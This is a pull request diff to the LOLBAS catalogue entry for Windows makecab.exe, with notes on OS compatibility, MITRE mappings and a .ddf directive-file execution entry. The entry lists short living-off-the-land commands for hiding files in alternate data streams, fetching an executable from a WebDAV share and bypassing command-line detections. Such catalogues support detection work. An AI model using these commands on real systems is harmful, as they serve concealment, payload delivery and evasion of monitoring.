### PR TITLE
Makecab - LOLBAS command, more information about Windows compatibility

### DIFF
--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -1,7 +1,7 @@
 ---
 Name: Makecab.exe
 Description: Binary to package existing files into a cabinet (.cab) file
-Author: 'Oddvar Moe'
+Author: Oddvar Moe
 Created: 2018-05-25
 Commands:
   - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
@@ -10,7 +10,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
@@ -19,7 +19,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
@@ -28,16 +28,18 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab /F directives.ddf
-    Description: Execute Makecab commands as they are defined in the .DDF (scripting) file.
-    Usecase: Bypass LOLBAS detection, execute Makecab commands without spawning additional processes or utilizing known command interpreters.
+    Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
+    Usecase: Bypass command-line based detections
     Category: Execute
     Privileges: User
-    MitreID: T1059
-    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    MitreID: T1036
+    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    Tags:
+      - Type: Compression
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe
   - Path: C:\Windows\SysWOW64\makecab.exe
@@ -48,10 +50,8 @@ Detection:
   - IOC: Makecab storing data into alternate data streams
 Resources:
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-  - Link: https://www.cs.toronto.edu/%7Esimon/howto/win2kcommands.html
-  - Link: https://www.informit.com/articles/article.aspx?p=101731&seqNum=2
-  - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
   - Link: https://ss64.com/nt/makecab-directives.html
+  - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
   - Link: https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application
 Acknowledgement:
   - Person: Oddvar Moe

--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -31,6 +31,13 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
+  - Command: makecab /F directives.ddf
+    Description: Execute Makecab commands as they are defined in the .DDF (scripting) file.
+    Usecase: Bypass LOLBAS detection, execute Makecab commands without spawning additional processes or utilizing known command interpreters.
+    Category: Execute
+    Privileges: User
+    MitreID: T1059	
+    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe
   - Path: C:\Windows\SysWOW64\makecab.exe
@@ -41,6 +48,8 @@ Detection:
   - IOC: Makecab storing data into alternate data streams
 Resources:
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+  - Link: https://ss64.com/nt/makecab-directives.html
+  - Link: https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'

--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -36,7 +36,7 @@ Commands:
     Usecase: Bypass LOLBAS detection, execute Makecab commands without spawning additional processes or utilizing known command interpreters.
     Category: Execute
     Privileges: User
-    MitreID: T1059	
+    MitreID: T1059
     OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe

--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -48,7 +48,7 @@ Detection:
   - IOC: Makecab storing data into alternate data streams
 Resources:
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
-  - Link: https://www.cs.toronto.edu/~simon/howto/win2kcommands.html
+  - Link: https://www.cs.toronto.edu/%7Esimon/howto/win2kcommands.html
   - Link: https://www.informit.com/articles/article.aspx?p=101731&seqNum=2
   - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
   - Link: https://ss64.com/nt/makecab-directives.html

--- a/yml/OSBinaries/Makecab.yml
+++ b/yml/OSBinaries/Makecab.yml
@@ -10,7 +10,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
@@ -19,7 +19,7 @@ Commands:
     Category: ADS
     Privileges: User
     MitreID: T1564.004
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
@@ -28,7 +28,7 @@ Commands:
     Category: Download
     Privileges: User
     MitreID: T1105
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
     Tags:
       - Type: Compression
   - Command: makecab /F directives.ddf
@@ -37,7 +37,7 @@ Commands:
     Category: Execute
     Privileges: User
     MitreID: T1059	
-    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
+    OperatingSystem: Windows 2000, Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe
   - Path: C:\Windows\SysWOW64\makecab.exe
@@ -48,6 +48,9 @@ Detection:
   - IOC: Makecab storing data into alternate data streams
 Resources:
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
+  - Link: https://www.cs.toronto.edu/~simon/howto/win2kcommands.html
+  - Link: https://www.informit.com/articles/article.aspx?p=101731&seqNum=2
+  - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
   - Link: https://ss64.com/nt/makecab-directives.html
   - Link: https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application
 Acknowledgement:


### PR DESCRIPTION
* Add information about makecab.exe (full disclosure - this originally comes from my past research about ex-filtrating 'certain information' without 7zip and WinRAR)
* `OperatingSystem` - updated to reflect `makecab.exe`  true age (definitely pre-embedded at the Windows XP times)

Related: #390 
